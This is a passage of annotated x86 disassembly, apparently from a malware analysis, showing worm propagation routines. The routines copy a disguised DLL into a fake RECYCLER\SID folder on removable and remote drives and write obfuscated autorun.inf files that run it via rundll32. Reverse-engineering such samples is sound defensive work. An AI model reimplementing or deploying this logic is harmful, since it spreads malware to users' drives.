idiv ecx
test edx, edx
jz short loc_9AB759
mov ebx, edx
loc_9AB711: ; CODE XREF: sub_9AB6D6+49�j
push offset asc_9A41FC ; " "
push esi
call _mbscat
dec ebx
pop ecx
pop ecx
jnz short loc_9AB711
jmp short loc_9AB759
; ---------------------------------------------------------------------------
loc_9AB723: ; CODE XREF: sub_9AB6D6+25�j
push offset asc_9A420C ; ";"
push esi
call _mbscat
push esi
call sub_9AB5F7
add esp, 0Ch
call edi ; rand
push 4
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB752
mov ebx, edx
loc_9AB745: ; CODE XREF: sub_9AB6D6+7A�j
push 1
push esi
call sub_9AB66E
dec ebx
pop ecx
pop ecx
jnz short loc_9AB745
loc_9AB752: ; CODE XREF: sub_9AB6D6+28�j
; sub_9AB6D6+6B�j
push esi
call sub_9AB5F7
pop ecx
loc_9AB759: ; CODE XREF: sub_9AB6D6+37�j
; sub_9AB6D6+4B�j
call sub_9AB63B
loc_9AB75E: ; CODE XREF: sub_9AB6D6+2B�j
dec ebp
jnz short loc_9AB6F0
pop ebp
pop ebx
loc_9AB763: ; CODE XREF: sub_9AB6D6+14�j
pop edi
pop esi
retn
sub_9AB6D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB766 proc near ; CODE XREF: sub_9AB855+85�p
; sub_9AB855+149�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
jmp short loc_9AB79D
; ---------------------------------------------------------------------------
loc_9AB76F: ; CODE XREF: sub_9AB766+3A�j
mov al, [esi]
cmp al, 61h
mov [ebp+var_4], al
mov [ebp+var_3], 0
jl short loc_9AB78E
cmp al, 7Ah
jg short loc_9AB78E
call ds:rand
test al, 1
jz short loc_9AB78E
and [ebp+var_4], 0DFh
loc_9AB78E: ; CODE XREF: sub_9AB766+14�j
; sub_9AB766+18�j ...
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call _mbscat
pop ecx
pop ecx
inc esi
loc_9AB79D: ; CODE XREF: sub_9AB766+7�j
cmp byte ptr [esi], 0
jnz short loc_9AB76F
pop esi
leave
retn
sub_9AB766 endp
; =============== S U B R O U T I N E =======================================
sub_9AB7A5 proc near ; CODE XREF: sub_9AB855+5E�p
; sub_9AB855+239�p
var_C = dword ptr -0Ch
push esi
mov esi, eax
push edi
push esi
call sub_9AB5F7
mov [esp+0Ch+var_C], offset asc_9A4218 ; "["
push esi
call _mbscat
push esi
call sub_9AB5F7
push 0
push esi
call sub_9AB66E
mov edi, ds:rand
add esp, 14h
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB7EC
push offset asc_9A4214 ; "]"
push esi
call _mbscat
pop ecx
pop ecx
loc_9AB7EC: ; CODE XREF: sub_9AB7A5+38�j
push esi
call sub_9AB5F7
pop ecx
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AB852
mov edi, edx
loc_9AB80D: ; CODE XREF: sub_9AB7A5+AB�j
push esi
call sub_9AB5F7
push 0
push esi
call sub_9AB66E
push esi
call sub_9AB5F7
push offset asc_9A4210 ; "="
push esi
call _mbscat
push esi
call sub_9AB5F7
push 0
push esi
call sub_9AB66E
push esi
call sub_9AB5F7
add esp, 28h
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
dec edi
jnz short loc_9AB80D
loc_9AB852: ; CODE XREF: sub_9AB7A5+64�j
pop edi
pop esi
retn
sub_9AB7A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB855 proc near ; CODE XREF: sub_9ABA9B+55�p
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Memory = dword ptr -0Ch
Str1 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
mov eax, offset aShellexecute ; "shellexecute"
push esi
mov esi, [ebp+arg_0]
push edi
mov ecx, offset aOpen ; "open"
mov edx, offset aAction ; "action"
mov [ebp+var_24], eax
mov edi, offset aIcon ; "icon"
mov [ebp+var_38], eax
mov [ebp+var_14], eax
mov eax, esi
mov [ebp+var_28], ecx
mov [ebp+var_20], edi
mov [ebp+var_1C], edx
mov [ebp+var_34], edi
mov [ebp+var_30], edx
mov [ebp+var_2C], offset aUseautoplay1 ; "useautoplay=1"
mov [ebp+var_18], ecx
call sub_9AB6D6
mov edi, ds:rand
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AB8BB
mov ebx, edx
loc_9AB8B1: ; CODE XREF: sub_9AB855+64�j
mov eax, esi
call sub_9AB7A5
dec ebx
jnz short loc_9AB8B1
loc_9AB8BB: ; CODE XREF: sub_9AB855+58�j
push esi
call sub_9AB5F7
mov [esp+48h+var_48], offset asc_9A4218 ; "["
push esi
call _mbscat
push esi
call sub_9AB5F7
push esi
mov eax, offset aAutorun ; "autorun"
call sub_9AB766
add esp, 10h
call edi ; rand
test al, 1
jz short loc_9AB8F5
push offset asc_9A4214 ; "]"
push esi
call _mbscat
pop ecx
pop ecx
loc_9AB8F5: ; CODE XREF: sub_9AB855+91�j
push esi
call sub_9AB5F7
pop ecx
call sub_9AB63B
cmp [ebp+arg_C], 5
jnz short loc_9AB913
lea ebx, [ebp+var_28]
loc_9AB90A: ; CODE XREF: sub_9AB855+C9�j
mov [ebp+arg_C], 4
jmp short loc_9AB926
; ---------------------------------------------------------------------------
loc_9AB913: ; CODE XREF: sub_9AB855+B0�j
push 2
pop eax
cmp [ebp+arg_C], eax
jnz short loc_9AB920
lea ebx, [ebp+var_38]
jmp short loc_9AB90A
; ---------------------------------------------------------------------------
loc_9AB920: ; CODE XREF: sub_9AB855+C4�j
lea ebx, [ebp+var_18]
mov [ebp+arg_C], eax
loc_9AB926: ; CODE XREF: sub_9AB855+BC�j
mov eax, [ebp+arg_C]
test eax, eax
jle short loc_9AB956
mov [ebp+var_4], eax
loc_9AB930: ; CODE XREF: sub_9AB855+FC�j
call edi ; rand
cdq
idiv [ebp+arg_C]
mov esi, edx
call edi ; rand
cdq
idiv [ebp+arg_C]
dec [ebp+var_4]
lea eax, [ebx+esi*4]
mov ecx, edx
mov edx, [eax]
lea ecx, [ebx+ecx*4]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edx
jnz short loc_9AB930
mov esi, [ebp+arg_0]
loc_9AB956: ; CODE XREF: sub_9AB855+D6�j
mov eax, esi
call sub_9AB6D6
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
jle loc_9ABA78
loc_9AB96B: ; CODE XREF: sub_9AB855+21D�j
mov eax, [ebp+var_4]
mov eax, [ebx+eax*4]
push eax ; unsigned __int8 *
mov [ebp+Str1], eax
call ds:_mbsdup
push 3Dh ; Val
push eax ; Str
mov [ebp+Memory], eax
call ds:strchr
add esp, 0Ch
test eax, eax
mov [ebp+var_10], eax
jz short loc_9AB994
mov byte ptr [eax], 0
loc_9AB994: ; CODE XREF: sub_9AB855+13A�j
push esi
call sub_9AB5F7
mov eax, [ebp+Memory]
push esi
call sub_9AB766
push esi
call sub_9AB5F7
push offset asc_9A4210 ; "="
push esi
call _mbscat
push esi
call sub_9AB5F7
mov eax, [ebp+var_10]
add esp, 18h
test eax, eax
jz short loc_9AB9CE
inc eax
push esi
call sub_9AB766
loc_9AB9CB: ; CODE XREF: sub_9AB855+1DA�j
pop ecx
jmp short loc_9ABA4C
; ---------------------------------------------------------------------------
loc_9AB9CE: ; CODE XREF: sub_9AB855+16D�j
push offset aIcon ; "icon"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9ABA10
call edi ; rand
test al, 1
push esi
mov eax, offset aSystemroot ; "%systemroot%"
jnz short loc_9AB9F2
mov eax, offset aWindir ; "%windir%"
loc_9AB9F2: ; CODE XREF: sub_9AB855+196�j
call sub_9AB766
pop ecx
push esi
mov eax, offset aSystem32Shell3 ; "\\system32\\shell32.dll"
call sub_9AB766
push esi
call sub_9AB5CF
push offset a4_0 ; ",4"
jmp short loc_9ABA43
; ---------------------------------------------------------------------------
loc_9ABA10: ; CODE XREF: sub_9AB855+18A�j
push offset aAction ; "action"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9ABA31
push offset Buffer
push esi
call _mbscat
pop ecx
jmp short loc_9AB9CB
; ---------------------------------------------------------------------------
loc_9ABA31: ; CODE XREF: sub_9AB855+1CC�j
mov eax, [ebp+arg_4]
push esi
call sub_9AB766
push esi
call sub_9AB5CF
push [ebp+arg_8]
loc_9ABA43: ; CODE XREF: sub_9AB855+1B9�j
push esi
call _mbscat
add esp, 10h
loc_9ABA4C: ; CODE XREF: sub_9AB855+177�j
push esi
call sub_9AB5CF
call sub_9AB63B
mov eax, esi
call sub_9AB6D6
push [ebp+Memory] ; Memory
call ds:free
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_C]
pop ecx
pop ecx
jl loc_9AB96B
loc_9ABA78: ; CODE XREF: sub_9AB855+110�j
mov eax, esi
call sub_9AB6D6
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9ABA96
mov edi, edx
loc_9ABA8C: ; CODE XREF: sub_9AB855+23F�j
mov eax, esi
call sub_9AB7A5
dec edi
jnz short loc_9ABA8C
loc_9ABA96: ; CODE XREF: sub_9AB855+233�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AB855 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABA9B(LPCSTR lpFileName,int,int)
sub_9ABA9B proc near ; CODE XREF: sub_9ABB9F+401�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_9A42A0
call __SEH_prolog
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], esi
push 30000h ; dwBytes
push 40h ; uFlags
mov edi, ds:GlobalAlloc
call edi ; GlobalAlloc
mov ebx, eax
mov [ebp+var_1C], ebx
test ebx, ebx
jz loc_9ABB6C
call ds:rand
cdq
push 2
pop ecx
idiv ecx
test edx, edx
mov eax, offset aRundll32 ; "rundll32"
jnz short loc_9ABAE8
mov eax, offset Srch
loc_9ABAE8: ; CODE XREF: sub_9ABA9B+46�j
push [ebp+arg_8]
push [ebp+arg_4]
push eax
push ebx
call sub_9AB855
push ebx ; Str
call strlen
add esp, 14h
lea eax, [eax+eax+4]
push eax ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov esi, eax
mov [ebp+var_20], esi
test esi, esi
jz short loc_9ABB6C
mov word ptr [esi], 0FEFFh
push ebx ; Str
call strlen
pop ecx
inc eax
push eax ; cchWideChar
lea eax, [esi+2]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar
test eax, eax
jz short loc_9ABB6C
push 1F01FFh ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push [ebp+lpFileName] ; lpFileName
push esi ; Str
call ds:wcslen
pop ecx
shl eax, 1
push eax ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_create_file_and_set_tile_to_kernel32_time
add esp, 0Ch
test eax, eax
jz short loc_9ABB6C
push 120089h ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9ABB6C: ; CODE XREF: sub_9ABA9B+2D�j
; sub_9ABA9B+73�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9ABB83
; ---------------------------------------------------------------------------
loc_9ABB72: ; DATA XREF: .text:stru_9A42A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ABB76: ; DATA XREF: .text:stru_9A42A0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
mov esi, [ebp+var_20]
loc_9ABB83: ; CODE XREF: sub_9ABA9B+D5�j
test esi, esi
jz short loc_9ABB8E
push esi ; hMem
call ds:GlobalFree
loc_9ABB8E: ; CODE XREF: sub_9ABA9B+EA�j
test ebx, ebx
jz short loc_9ABB99
push ebx ; hMem
call ds:GlobalFree
loc_9ABB99: ; CODE XREF: sub_9ABA9B+F5�j
call __SEH_epilog
retn
sub_9ABA9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9ABB9F(LPVOID)
sub_9ABB9F proc near ; CODE XREF: sub_9AC151+7F�p
; DATA XREF: sub_9ABFD3+8B�o
var_7B0 = dword ptr -7B0h
var_6AD = byte ptr -6ADh
FindFileData = _WIN32_FIND_DATAA ptr -6ACh
var_56C = byte ptr -56Ch
var_469 = byte ptr -469h
Dest = byte ptr -468h
var_365 = byte ptr -365h
PathName = byte ptr -364h
var_261 = byte ptr -261h
var_260 = byte ptr -260h
var_15D = byte ptr -15Dh
FileName = byte ptr -15Ch
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_30 = dword ptr -30h
FileSystemFlags = dword ptr -2Ch
Str1 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 7A0h
push offset stru_9A4328
call __SEH_prolog
mov edi, [ebp+arg_0]
mov [ebp+hMem], edi
xor esi, esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_40], esi
mov [ebp+FileSystemFlags], esi
call sub_Impersonate_loggedon_user_for_process
push esi ; nFileSystemNameSize
push esi ; lpFileSystemNameBuffer
lea eax, [ebp+FileSystemFlags]
push eax ; lpFileSystemFlags
push esi ; lpMaximumComponentLength
push esi ; lpVolumeSerialNumber
push esi ; nVolumeNameSize
push esi ; lpVolumeNameBuffer
push dword ptr [edi+4] ; lpRootPathName
call ds:GetVolumeInformationA
test eax, eax
jz loc_9ABFB1
test byte ptr [ebp+FileSystemFlags+2], 8
jnz loc_9ABFB1
push 80012F5h ; Seed
call ds:srand
mov esi, ds:rand
call esi ; rand
cdq
push 4
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+var_3C]
push eax
call sub_make_array_of_alphabet
add esp, 0Ch
loc_9ABC12: ; CODE XREF: sub_9ABB9F+99�j
call esi ; rand
cdq
push 3
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+Str1]
push eax
call sub_make_array_of_alphabet
push offset aDll_0 ; "dll"
lea eax, [ebp+Str1]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9ABC12
call esi ; rand
cdq
push 10h
pop ecx
idiv ecx
test edx, edx
jz loc_9ABCFE
mov edi, 104h
push edi ; Count
push offset aRecycler ; "RECYCLER"
lea eax, [ebp+Dest]
push eax ; Dest
call ds:strncpy
add esp, 0Ch
mov [ebp+var_365], 0
call esi ; rand
cdq
mov ebx, 2710h
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
idiv ebx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push offset aSDDDDDDDDDDDDD ; "S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d"
push edi ; Count
lea eax, [ebp+var_260]
push eax ; Dest
mov ebx, ds:_snprintf
call ebx ; _snprintf
add esp, 40h
mov [ebp+var_15D], 0
jmp short loc_9ABD3C
; ---------------------------------------------------------------------------
loc_9ABCFE: ; CODE XREF: sub_9ABB9F+A5�j
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+Dest]
push eax
call sub_make_array_of_alphabet
call esi ; rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 0Ah
push edx
lea eax, [ebp+var_260]
push eax
call sub_make_array_of_alphabet
add esp, 10h
mov edi, 104h
mov ebx, ds:_snprintf
loc_9ABD3C: ; CODE XREF: sub_9ABB9F+15D�j
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSSSS_S ; "%s%s\\%s\\%s.%s"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 20h
mov [ebp+var_59], 0
mov [ebp+var_20], 1
and [ebp+var_30], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9ABD9C
push eax ; hFindFile
call ds:FindClose
loc_9ABD9C: ; CODE XREF: sub_9ABB9F+1F4�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9ABDAF
cmp [ebp+FindFileData.nFileSizeLow], 0
jnz loc_9ABED4
loc_9ABDAF: ; CODE XREF: sub_9ABB9F+201�j
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSS_0 ; "%s%s"
push edi ; Count
lea eax, [ebp+PathName]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_261], 0
push 1F01FFh ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AD15E
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+PathName]
push eax ; lpPathName
call ds:CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9ABE0D
call ds:GetLastError
cmp eax, 0B7h
jnz loc_9ABED4
loc_9ABE0D: ; CODE XREF: sub_9ABB9F+25B�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+PathName]
push eax
push offset aSS_1 ; "%s\\%s"
push edi ; Count
lea eax, [ebp+var_56C]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_469], 0
push 1F01FFh ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AD15E
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+var_56C]
push eax ; lpPathName
call ds:CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9ABE68
call ds:GetLastError
cmp eax, 0B7h
jnz short loc_9ABEC4
loc_9ABE68: ; CODE XREF: sub_9ABB9F+2BA�j
push 1F01FFh ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AD15E
lea eax, [ebp+FileName]
push eax ; lpFileName
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push lpBuffer ; lpBuffer
call sub_create_file_and_set_tile_to_kernel32_time
add esp, 14h
mov [ebp+var_20], eax
test eax, eax
jz short loc_9ABEC4
push 1200A9h ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AD15E
push 21h ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AD15E
add esp, 10h
mov [ebp+var_30], 1
loc_9ABEC4: ; CODE XREF: sub_9ABB9F+2C7�j
; sub_9ABB9F+2FA�j
push 0 ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9ABED4: ; CODE XREF: sub_9ABB9F+20A�j
; sub_9ABB9F+268�j
cmp [ebp+var_20], 0
jz loc_9ABFB1
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSautorun_inf ; "%sautorun.inf"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 10h
mov [ebp+var_59], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9ABF1D
push eax ; hFindFile
call ds:FindClose
loc_9ABF1D: ; CODE XREF: sub_9ABB9F+375�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9ABF35
cmp [ebp+FindFileData.nFileSizeLow], 1000h
jb short loc_9ABF35
cmp [ebp+var_30], 0
jz short loc_9ABFB1
loc_9ABF35: ; CODE XREF: sub_9ABB9F+382�j
; sub_9ABB9F+38E�j ...
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+var_58]
push eax
call sub_make_array_of_alphabet
push offset aMarnwkcw ; "marnwkcw"
lea eax, [ebp+var_58]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9ABF35
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
push offset a_SSS_SS ; ".\\%s\\%s\\%s.%s,%s"
push edi ; Count
lea eax, [ebp+var_7B0]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_6AD], 0
mov eax, [ebp+hMem]
push dword ptr [eax] ; int
lea eax, [ebp+var_7B0]
push eax ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9ABA9B
add esp, 2Ch
jmp short loc_9ABFB1
; ---------------------------------------------------------------------------
loc_9ABFAA: ; DATA XREF: .text:stru_9A4328�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ABFAE: ; DATA XREF: .text:stru_9A4328�o
mov esp, [ebp+ms_exc.old_esp]
loc_9ABFB1: ; CODE XREF: sub_9ABB9F+3A�j
; sub_9ABB9F+44�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+hMem]
push dword ptr [esi+4] ; Memory
call ds:free
pop ecx
push esi ; hMem
call ds:GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9ABB9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABFD3(const CHAR RootPathName)
sub_9ABFD3 proc near ; CODE XREF: sub_9AC078+12�p
ThreadId = dword ptr -4
RootPathName = byte ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+RootPathName], 8000h
jnz locret_9AC076
cmp dword ptr [eax+4], 2
jnz locret_9AC076
mov ecx, [eax+0Ch]
xor al, al
loc_9ABFF3: ; CODE XREF: sub_9ABFD3+2B�j
test cl, 1
jnz short loc_9AC000
shr ecx, 1
inc al
cmp al, 1Ah
jl short loc_9ABFF3
loc_9AC000: ; CODE XREF: sub_9ABFD3+23�j
cmp al, 1
jle short locret_9AC076
add al, 41h
mov [ebp+RootPathName], al
push edi
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
mov byte ptr [ebp+9], 3Ah
mov byte ptr [ebp+0Ah], 5Ch
mov byte ptr [ebp+0Bh], 0
call ds:GetDriveTypeA
mov edi, eax
cmp edi, 2
jz short loc_9AC036
cmp edi, 3
jz short loc_9AC036
cmp edi, 4
jz short loc_9AC036
cmp edi, 5
jnz short loc_9AC075
loc_9AC036: ; CODE XREF: sub_9ABFD3+52�j
; sub_9ABFD3+57�j ...
push esi
push 8 ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AC074
lea eax, [ebp+RootPathName]
push eax ; unsigned __int8 *
mov [esi], edi
call ds:_mbsdup
pop ecx
mov [esi+4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push esi ; lpParameter
push offset sub_9ABB9F ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
loc_9AC074: ; CODE XREF: sub_9ABFD3+72�j
pop esi
loc_9AC075: ; CODE XREF: sub_9ABFD3+61�j
pop edi
locret_9AC076: ; CODE XREF: sub_9ABFD3+B�j
; sub_9ABFD3+15�j ...
leave
retn
sub_9ABFD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AC078(int,int,CHAR RootPathName,int)
sub_9AC078 proc near ; DATA XREF: sub_9AC09E+1E�o
arg_4 = dword ptr 0Ch
RootPathName = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 219h
jnz short loc_9AC097
push dword ptr [ebp+RootPathName] ; RootPathName
mov eax, [ebp+arg_C]
call sub_9ABFD3
xor eax, eax
pop ecx
inc eax
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_9AC097: ; CODE XREF: sub_9AC078+A�j
pop ebp
jmp ds:DefWindowProcA
sub_9AC078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC09E(LPVOID)
sub_9AC09E proc near ; DATA XREF: sub_infect_remote_and_removable_drives+6F�o
Dst = byte ptr -58h
var_54 = dword ptr -54h
hInstance = dword ptr -48h
var_34 = dword ptr -34h
Msg = MSG ptr -30h
ClassName = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 58h
push esi
call sub_call_srand_with_seed_from_thread_id
push 28h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call memset
add esp, 0Ch
push esi ; lpModuleName
mov [ebp+var_54], offset sub_9AC078
call ds:GetModuleHandleA
mov [ebp+hInstance], eax
call ds:rand
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+ClassName]
add edx, ecx
push edx
push eax
call sub_make_array_of_alphabet
pop ecx
lea eax, [ebp+ClassName]
mov [ebp+var_34], eax
pop ecx
lea eax, [ebp+Dst]
push eax ; lpWndClass
call ds:RegisterClassA
push esi ; lpParam
push [ebp+hInstance] ; hInstance
mov eax, 80000000h
push esi ; hMenu
push esi ; hWndParent
push eax ; nHeight
push eax ; nWidth
push eax ; Y
push eax ; X
push esi ; dwStyle
push offset WindowName ; "recv"
lea eax, [ebp+ClassName]
push eax ; lpClassName
push esi ; dwExStyle
call ds:CreateWindowExA
test eax, eax
jz short loc_9AC14A
push edi
mov edi, ds:GetMessageA
jmp short loc_9AC13C
; ---------------------------------------------------------------------------
loc_9AC123: ; CODE XREF: sub_9AC09E+A9�j
cmp eax, 0FFFFFFFFh
jz short loc_9AC149
lea eax, [ebp+Msg]
push eax ; lpMsg
call ds:TranslateMessage
lea eax, [ebp+Msg]
push eax ; lpMsg
call ds:DispatchMessageA
loc_9AC13C: ; CODE XREF: sub_9AC09E+83�j
push esi ; wMsgFilterMax
push esi ; wMsgFilterMin
lea eax, [ebp+Msg]
push esi ; hWnd
push eax ; lpMsg
call edi ; GetMessageA
cmp eax, esi
jnz short loc_9AC123
loc_9AC149: ; CODE XREF: sub_9AC09E+88�j
pop edi
loc_9AC14A: ; CODE XREF: sub_9AC09E+7A�j
xor eax, eax
pop esi
leave
retn 4
sub_9AC09E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC151(LPVOID)
sub_9AC151 proc near ; DATA XREF: sub_infect_remote_and_removable_drives+57�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
RootPathName = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov edi, ds:Sleep
mov ebx, 1388h
push ebx ; dwMilliseconds
call edi ; Sleep
call ds:GetLogicalDrives
mov [ebp+var_C], eax
mov [ebp+var_1], 0
loc_9AC175: ; CODE XREF: sub_9AC151+91�j
test byte ptr [ebp+var_C], 1
jz short loc_9AC1D8
cmp [ebp+var_1], 1
jle short loc_9AC1D8
mov al, [ebp+var_1]
add al, 41h
mov [ebp+RootPathName], al
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
mov [ebp+var_7], 3Ah
mov [ebp+var_6], 5Ch
mov [ebp+var_5], 0
call ds:GetDriveTypeA
cmp eax, 2
mov [ebp+var_10], eax
jz short loc_9AC1AC
cmp eax, 4
jnz short loc_9AC1D8
loc_9AC1AC: ; CODE XREF: sub_9AC151+54�j
push 8 ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AC1D8
mov eax, [ebp+var_10]
mov [esi], eax
lea eax, [ebp+RootPathName]
push eax ; unsigned __int8 *
call ds:_mbsdup
pop ecx
push esi ; LPVOID
mov [esi+4], eax
call sub_9ABB9F
push ebx ; dwMilliseconds
call edi ; Sleep
